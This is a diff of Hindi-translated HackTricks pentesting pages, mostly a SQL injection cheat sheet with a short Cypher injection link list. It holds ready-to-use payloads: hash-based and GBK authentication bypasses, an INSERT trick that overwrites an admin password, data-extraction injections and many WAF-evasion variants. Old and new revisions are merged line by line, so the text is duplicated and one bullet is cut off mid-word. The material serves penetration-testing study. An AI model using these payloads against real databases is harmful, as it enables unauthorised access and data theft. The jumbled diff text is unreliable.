या आपको **MySQL, PostgreSQL, Oracle, MSSQL, SQLite और HQL के संबंधित कई ट्रिक्स** मिलेंगे [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection) या आपको **MySQL, PostgreSQL, Oracle, MSSQL, SQLite और HQL के संबंध में बहुत सारी ट्रिक्स** मिलेंगी [**https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection**](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection)
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह सम्मेलन प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए हर शाखा में एक उत्तेजक मिलन स्थल है। [**RootedCON**](https://www.rootedcon.com/) **स्पेन** में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और **यूरोप** में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह सम्मेलन प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उत्तेजक मिलन स्थल है।
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
@ -289,7 +289,7 @@ a' UNION SELECT EXTRACTVALUE(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DO
```sql ```sql
"SELECT * FROM admin WHERE pass = '".md5($password,true)."'" "SELECT * FROM admin WHERE pass = '".md5($password,true)."'"
``` ```
यह क्वेरी एक कमजोरी को प्रदर्शित करती है जब MD5 का उपयोग सत्य के साथ किया जाता है असली आउटपुट के लिए प्रमाणीकरण चेक्स में, जिससे सिस्टम SQL इन्जेक्शन के लिए संवेदनशील हो जाता है। हमलावर इसे उत्पन्न कर सकते हैं जब वे इनपुट को तैयार करते हैं जो, जब हैश किया जाता है, अप्रत्याशित SQL कमांड भागों को उत्पन्न करते हैं, जिससे अनधिकृत पहुंच होती है। यह क्वेरी एक कमजोरी को प्रदर्शित करती है जब MD5 का उपयोग सत्य के साथ किया जाता है जो कि प्रमाणीकरण जांचों में रॉ आउटपुट के लिए है, जिससे सिस्टम SQL इन्जेक्शन के लिए संवेदनशील हो जाता है। हमलावर इसे उत्पन्न कर सकते हैं जब वे इनपुट को तैयार करते हैं जो, जब हैश किया जाता है, अप्रत्याशित SQL कमांड भागों को उत्पन्न करते हैं, जिससे अनधिकृत पहुंच होती है।
```sql ```sql
md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b<EFBFBD> md5("ffifdyop", true) = 'or'6<>]<5D><>!r,<2C><>b<EFBFBD>
sha1("3fDf ", true) = Q<>u'='<27>@<40>[<5B>t<EFBFBD>- o<><6F>_-! sha1("3fDf ", true) = Q<>u'='<27>@<40>[<5B>t<EFBFBD>- o<><6F>_-!
@ -298,16 +298,16 @@ sha1("3fDf ", true) = Q<>u'='<27>@<40>[<5B>t<EFBFBD>- o<><6F>_-!
```sql ```sql
admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055' admin' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055'
``` ```
**सुझाई गई सूची**: **सुझाए गए सूची**:
आपको प्रत्येक पंक्ति का उपयोग उपयोगकर्ता नामके रूप में करना चाहिए और हमेशा पासवर्ड के रूप में: _**Pass1234.**_\ आपको प्रत्येक पंक्ति का उपयोग उपयोगकर्ता नामके रूप में करना चाहिए और हमेशा पासवर्ड के रूप में: _**Pass1234.**_\
_(ये payloads इस खंड की शुरुआत में उल्लिखित बड़ी सूची में भी शामिल हैं)_ _(ये पेलोड इस सेक्शन की शुरुआत में उल्लिखित बड़ी सूची में भी शामिल हैं)_
{% file src="../../.gitbook/assets/sqli-hashbypass.txt" %} {% file src="../../.gitbook/assets/sqli-hashbypass.txt" %}
### GBK प्रमाणीकरण बायपास ### GBK प्रमाणीकरण बायपास
यदि ' को बचाया जा रहा है तो आप %A8%27 का उपयोग कर सकते हैं, और जब ' को बचाया जाता है तो यह बनाया जाएगा: 0xA80x5c0x27 (_╘'_) यदि ' को छोड़ दिया जा रहा है तो आप %A8%27 का उपयोग कर सकते हैं, और जब ' को छोड़ दिया जाता है तो यह बनाया जाएगा: 0xA80x5c0x27 (_╘'_)
```sql ```sql
%A8%27 OR 1=1;-- 2 %A8%27 OR 1=1;-- 2
%8C%A8%27 OR 1=1-- 2 %8C%A8%27 OR 1=1-- 2
@ -326,7 +326,7 @@ print r.text
```sql ```sql
SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/ SLEEP(1) /*' or SLEEP(1) or '" or SLEEP(1) or "*/
``` ```
## Insert Statement ## इन्सर्ट स्टेटमेंट
### मौजूदा ऑब्जेक्ट/उपयोगकर्ता का पासवर्ड संशोधित करें ### मौजूदा ऑब्जेक्ट/उपयोगकर्ता का पासवर्ड संशोधित करें
@ -336,7 +336,7 @@ name=','');WAITFOR%20DELAY%20'0:0:5'--%20-
``` ```
### ON DUPLICATE KEY UPDATE ### ON DUPLICATE KEY UPDATE
`ON DUPLICATE KEY UPDATE` क्लॉज MySQL में उपयोग किया जाता है ताकि डेटाबेस को बताया जा सके कि जब कोशिश की जाती है कि एक पंक्ति डाली जाए जो एक अद्वितीय सूचकांक या प्राथमिक कुंजी में एक डुप्लिकेट मान का परिणाम होगा, तो डेटाबेस को क्या कार्रवाई करनी चाहिए। निम्नलिखित उदाहरण दिखाता है कि यह सुविधा कैसे उपयोग की जा सकती है ताकि एक प्रशासक खाते का पासवर्ड संशोधित किया जा सके: `ON DUPLICATE KEY UPDATE` क्लॉज MySQL में उपयोग किया जाता है ताकि डेटाबेस को बताया जा सके कि जब कोशिश की जाती है कि एक पंक्ति डाली जाए जो एक अद्वितीय सूचकांक या प्राथमिक कुंजी में एक डुप्लिकेट मान का परिणाम देगी, तो डेटाबेस को क्या कार्रवाई करनी चाहिए। निम्नलिखित उदाहरण दिखाता है कि यह सुविधा कैसे उपयोग की जा सकती है ताकि एक प्रशासक खाते का पासवर्ड संशोधित किया जा सके:
उदाहरण पेलोड इन्जेक्शन: उदाहरण पेलोड इन्जेक्शन:
@ -346,15 +346,8 @@ INSERT INTO users (email, password) VALUES ("generic_user@example.com", "bcrypt_
``` ```
यह कैसे काम करता है: यह कैसे काम करता है:
- क्वेरी दो पंक्तियाँ डालने का प्रयास करती है: `generic_user@example.com` के लिए एक और `admin_generic@example.com` के लिए एक। - क्वेरी दो पंक्तियाँ डालने का प्रयास करती है: एक `generic_user@example.com` के लिए और दूसरा `admin_generic@example.com` के लिए।
- अगर `admin_generic@example.com` के लिए पंक्ति पहले से मौजूद है, तो `ON DUPLICATE KEY UPDATE` क्लॉज़ ट्रिगर होता है, जिससे MySQL को मौजूदा पंक्ति के `password` फ़ील्ड को "bcrypt_hash_of_newpassword" में अपडेट करने के लिए निर्देशित किया जाता है। - अगर `admin_generic@example.com` के लिए पंक्ति पहले से मौजूद है, तो `ON DUPLICATE KEY UPDATE` शर्त सक्रिय हो जाती है, जिससे MySQL को मौजूदा पंक्ति के `password` फ़ील्ड को "bcrypt_hash_of_newpassword" में अपड
- इसके फलस्वरूप, प्रमाणीकरण फिर `admin_generic@example.com` का प्रयास किया जा सकता है जिसमें "bcrypt_hash_of_newpassword" के लिए उस नए पासवर्ड के bcrypt हैश का उपयोग किया जाता है (जो वास्तविक पासवर्ड के इच्छित हैश का बदला जाना चाहिए)।
### जानकारी निकालें
#### एक साथ 2 खाते बनाना
नए उपयोगकर्ता और उपयोगकर्ता नाम, पासवर्ड और ईमेल बनाने की कोशिश करते समय:
``` ```
SQLi payload: SQLi payload:
username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- - username=TEST&password=TEST&email=TEST'),('otherUsername','otherPassword',(select flag from flag limit 1))-- -
@ -369,7 +362,7 @@ A new user with username=otherUsername, password=otherPassword, email:FLAG will
```sql ```sql
'+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+' '+(select conv(hex(substr(table_name,1,6)),16,10) FROM information_schema.tables WHERE table_schema=database() ORDER BY table_name ASC limit 0,1)+'
``` ```
टेक्निकल टेक्स्ट को प्राप्त करने के लिए आप निम्नलिखित का उपयोग कर सकते हैं: टेक्निकल टेक्स्ट प्राप्त करने के लिए आप निम्नलिखित का उपयोग कर सकते हैं:
```python ```python
__import__('binascii').unhexlify(hex(215573607263)[2:]) __import__('binascii').unhexlify(hex(215573607263)[2:])
``` ```
@ -384,13 +377,13 @@ __import__('binascii').unhexlify(hex(215573607263)[2:])
``` ```
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन की सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफनती मिलन स्थल है हर विषय में। [**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने के मिशन** के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है हर विषय में।
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
## Routed SQL injection ## Routed SQL injection
रूटेड SQL इजेक्शन एक स्थिति है जहाँ इंजेक्टेबल क्वेरी वह नहीं है जो आउटपुट देती है बल्कि इंजेक्टेबल क्वेरी का आउटपुट वह क्वेरी है जो आउटपुट देती है। ([पेपर से](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt)) रूटेड SQL इन्जेक्शन एक स्थिति है जहाँ इंजेक्टेबल क्वेरी वह नहीं है जो आउटपुट देती है बल्कि इंजेक्टेबल क्वेरी का आउटपुट वह क्वेरी है जो आउटपुट देती है। ([पेपर से](http://repository.root-me.org/Exploitation%20-%20Web/EN%20-%20Routed%20SQL%20Injection%20-%20Zenodermus%20Javanicus.txt))
उदाहरण: उदाहरण:
``` ```
@ -401,9 +394,9 @@ __import__('binascii').unhexlify(hex(215573607263)[2:])
[यहाँ से प्रारंभिक बायपास](https://github.com/Ne3o1/PayLoadAllTheThings/blob/master/SQL%20injection/README.md#waf-bypass) [यहाँ से प्रारंभिक बायपास](https://github.com/Ne3o1/PayLoadAllTheThings/blob/master/SQL%20injection/README.md#waf-bypass)
### कोई अंतरिक्ष बायपास ### कोई अंतर्विराम बायपास
कोई अंतरिक्ष (%20) - व्हाइटस्पेस विकल्प का उपयोग करके बायपास करें कोई अंतर्विराम (%20) - व्हाइटस्पेस विकल्प का उपयोग करके बायपास करें
```sql ```sql
?id=1%09and%091=1%09-- ?id=1%09and%091=1%09--
?id=1%0Dand%0D1=1%0D-- ?id=1%0Dand%0D1=1%0D--
@ -414,13 +407,23 @@ __import__('binascii').unhexlify(hex(215573607263)[2:])
``` ```
### No Whitespace - टिप्पणियों का उपयोग करके बायपास करें ### No Whitespace - टिप्पणियों का उपयोग करके बायपास करें
In some cases, you may encounter filters that block whitespace characters. In such situations, you can bypass the filter by using comments to separate SQL keywords. For example, you can convert a query like `SELECT * FROM users WHERE username='admin' AND password='password'` into `SELECT/**/*/**/FROM/**/users/**/WHERE/**/username='admin'/**/AND/**/password='password'`. This technique allows you to evade detection and successfully execute SQL injection attacks even when whitespace is restricted. In some cases, the application may filter out whitespace characters to prevent SQL injection attacks. However, you can bypass this restriction by using comments to separate SQL keywords. This technique allows you to execute SQL queries without spaces between keywords.
For example, instead of using:
```sql
SELECT * FROM users WHERE username = 'admin' AND password = 'password';
```
You can use comments to bypass the whitespace restriction:
```sql
SELECT/**/*/**/FROM/**/users/**/WHERE/**/username/**/=/**/'admin'/**/AND/**/password/**/=/**/'password';
```
```sql ```sql
?id=1/*comment*/and/**/1=1/**/-- ?id=1/*comment*/and/**/1=1/**/--
``` ```
### No Whitespace - पैरेंथेसिस का उपयोग करके बायपास करें ### कोई व्हाइटस्पेस - पैरेंथेसिस का उपयोग करके बायपास करें
In some cases, spaces are not allowed in the input fields. In such situations, you can bypass the restriction by using parenthesis to separate the SQL keywords. For example, instead of `UNION SELECT`, you can use `UNION(SELECT) SELECT`. This technique can help you perform SQL injection even when whitespace is restricted.
```sql ```sql
?id=(1)and(1)=(1)-- ?id=(1)and(1)=(1)--
``` ```
@ -432,13 +435,13 @@ SELECT 1,2,3,4 -> UNION SELECT * FROM (SELECT 1)a JOIN (SELECT 2)b JOIN (SELE
``` ```
### सामान्य बायपास ### सामान्य बायपास
कीवर्ड का उपयोग करके ब्लैकलिस्ट - अपरकेस/लोअरकेस का उपयोग करके बायपास करें कीवर्ड का उपयोग करके काल सूची - अपरकेस/लोअरकेस का उपयोग करके बायपास करें
```sql ```sql
?id=1 AND 1=1# ?id=1 AND 1=1#
?id=1 AnD 1=1# ?id=1 AnD 1=1#
?id=1 aNd 1=1# ?id=1 aNd 1=1#
``` ```
### Blacklist के लिए कीवर्ड का इस्तेमाल केस इनसेंसिटिव - एक समकक्ष ऑपरेटर का उपयोग करके बायपास करें ### Blacklist के लिए कीवर्ड का इस्तेमाल केस इनसेंसिटिव - एक समकक्ष ऑपरेटर का उपयोग करके उसे अनदेखा करें
``` ```
AND -> && -> %26%26 AND -> && -> %26%26
OR -> || -> %7C%7C OR -> || -> %7C%7C
@ -448,18 +451,18 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
``` ```
### वैज्ञानिक नोटेशन WAF बायपास ### वैज्ञानिक नोटेशन WAF बायपास
आप इस तरह के ट्रिक का अधिक विस्तृत विवरण [gosecure ब्लॉग](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/) में पा सकते हैं।\ आप इस तरीके के बारे में और विस्तृत जानकारी [gosecure ब्लॉग](https://www.gosecure.net/blog/2021/10/19/a-scientific-notation-bug-in-mysql-left-aws-waf-clients-vulnerable-to-sql-injection/) में पा सकते हैं।\
मूल रूप से, आप WAF को इसे बायपास करने के लिए अप्रत्याशित तरीकों में वैज्ञानिक नोटेशन का उपयोग कर सकते हैं: मूल रूप से, आप WAF को बायपास करने के लिए अप्रत्याशित तरीके से वैज्ञानिक नोटेशन का उपयोग कर सकते हैं:
``` ```
-1' or 1.e(1) or '1'='1 -1' or 1.e(1) or '1'='1
-1' or 1337.1337e1 or '1'='1 -1' or 1337.1337e1 or '1'='1
' or 1.e('')= ' or 1.e('')=
``` ```
### कॉलम नामों की प्रतिबंधन को उलट दें ### कॉलम नामों की प्रतिबंधितता को उलट देना
सबसे पहले, ध्यान दें कि यदि **मूल क्वेरी और वह तालिका जहां से आप झंडा निकालना चाहते हैं, उनके पास एक ही संख्या के कॉलम हैं** तो आप बस यह कर सकते हैं: `0 UNION SELECT * FROM flag` सबसे पहले, ध्यान दें कि यदि **मूल क्वेरी और तालिका जहां से आप झंडा निकालना चाहते हैं, उनके पास एक ही संख्या के कॉलम हैं** तो आप बस यह कर सकते हैं: `0 UNION SELECT * FROM flag`
यह संभव है कि आप **किसी तालिका के तीसरे कॉलम तक पहुंचें बिना उसके नाम का उपयोग किए** जानकारी के लिए निम्नलिखित प्रकार का क्वेरी उपयोग करें: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, इसलिए एक एसक्यूएल इन्जेक्शन में यह ऐसा दिखेगा: यह संभव है कि आप **किसी तालिका के तीसरे कॉलम तक पहुंचें बिना उसके नाम का उपयोग किए** जा सकता है एक क्वेरी का उपयोग करके जैसे कि निम्नलिखित: `SELECT F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;`, इसलिए एक एसक्यूएल इन्जेक्शन में यह ऐसा दिखेगा:
```bash ```bash
# This is an example with 3 columns that will extract the column number 3 # This is an example with 3 columns that will extract the column number 3
-1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F; -1 UNION SELECT 0, 0, 0, F.3 FROM (SELECT 1, 2, 3 UNION SELECT * FROM demo)F;
@ -486,7 +489,7 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
<figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure> <figure><img src="https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-L_2uGJGU7AVNRcqRvEi%2Fuploads%2FelPCTwoecVdnsfjxCZtN%2Fimage.png?alt=media&#x26;token=9ee4ff3e-92dc-471c-abfe-1c25e446a6ed" alt=""><figcaption></figcaption></figure>
[**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उबाऊ मिलन स्थल है। [**RootedCON**](https://www.rootedcon.com/) स्पेन में सबसे महत्वपूर्ण साइबर सुरक्षा घटना है और यूरोप में सबसे महत्वपूर्ण में से एक है। **तकनीकी ज्ञान को बढ़ावा देने** के मिशन के साथ, यह कांग्रेस प्रौद्योगिकी और साइबर सुरक्षा विशेषज्ञों के लिए एक उफान मिलने का समारोह है।
{% embed url="https://www.rootedcon.com/" %} {% embed url="https://www.rootedcon.com/" %}
@ -494,10 +497,10 @@ WHERE -> HAVING --> LIMIT X,1 -> group_concat(CASE(table_schema)When(database())
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **नवीनतम संस्करण का पहुंच चाहते हैं या PEASS को डाउनलोड करना चाहते हैं**? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जाँच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का विज्ञापन HackTricks में देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) कलेक्शन, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें * हमारे विशेष [**NFTs**](https://opensea.io/collection/the-peass-family) संग्रह, [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com) * [**आधिकारिक PEASS और HackTricks स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)**.** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर पर फॉलो** करें **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud)**। * **हैकिंग ट्रिक्स साझा करें, [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में PRs सबमिट करके**।
</details> </details>

View file

@ -4,15 +4,15 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md) [**@carlospolopm**](https://twitter.com/hacktricks_live)** का** **अनुसरण** करें। * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर फॉलो** करें।
* **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो** (https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके।** * **हैकिंग ट्रिक्स साझा करें, हैकट्रिक्स रेपो**](https://github.com/carlospolop/hacktricks) **और** [**हैकट्रिक्स-क्लाउड रेपो**](https://github.com/carlospolop/hacktricks-cloud) **में पीआर जमा करके।
</details> </details>
निम्नलिखित ब्लॉग्स की जाच करें: निम्नलिखित ब्लॉग्स की जाच करें:
* [https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits](https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits) * [https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits](https://www.varonis.com/blog/neo4jection-secrets-data-and-cloud-exploits)
* [https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8](https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8) * [https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8](https://infosecwriteups.com/the-most-underrated-injection-of-all-time-cypher-injection-fa2018ba0de8)
@ -21,10 +21,10 @@
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण देखना चाहते हैं या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापित करना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जाच करें!
* [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह। * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटी**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें। * [**आधिकारिक PEASS और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें।
